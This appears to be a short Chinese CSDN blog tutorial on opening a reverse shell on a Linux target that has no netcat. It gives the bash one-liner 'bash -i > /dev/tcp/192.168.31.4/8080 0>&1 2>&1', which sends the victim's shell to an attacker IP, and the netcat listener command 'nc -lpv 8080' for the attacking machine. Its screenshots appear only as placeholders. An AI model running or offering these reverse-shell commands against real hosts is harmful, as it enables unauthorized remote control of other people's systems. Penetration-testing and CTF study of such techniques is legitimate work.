linux 反弹shell

本文介绍如何在目标主机无netcat的情况下,通过bash-i>/dev/tcp/攻击者IP/端口重定向进行远程控制,包括攻击者监听端口的命令和被控者执行的步骤。重点讲解了bash反弹技术的应用和实施过程。
摘要由CSDN通过智能技术生成

当靶机上有netcat就简单了,先在攻击机上监听一个端口:
在这里插入图片描述
再在靶机上把bash反弹给攻击机:在这里插入图片描述
这时在攻击机上就可以看到连接成功,也就可以执行命令了:在这里插入图片描述

但是,很多情况下,目标主机上并没有netcat,这时就可以使用如下方式:

最常用也是最好用的就是如下命令:

bash -i > /dev/tcp/192.168.31.4/8080 0>&1 2>&1   

在这里插入图片描述
2>&1 将标准错误重定向到标准输出中。

上述是在被控者的机器上。

需要在攻击者的机器上监听端口,一般使用如下命令:

nc -lpv 8080  #8080表示你监听的端口
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值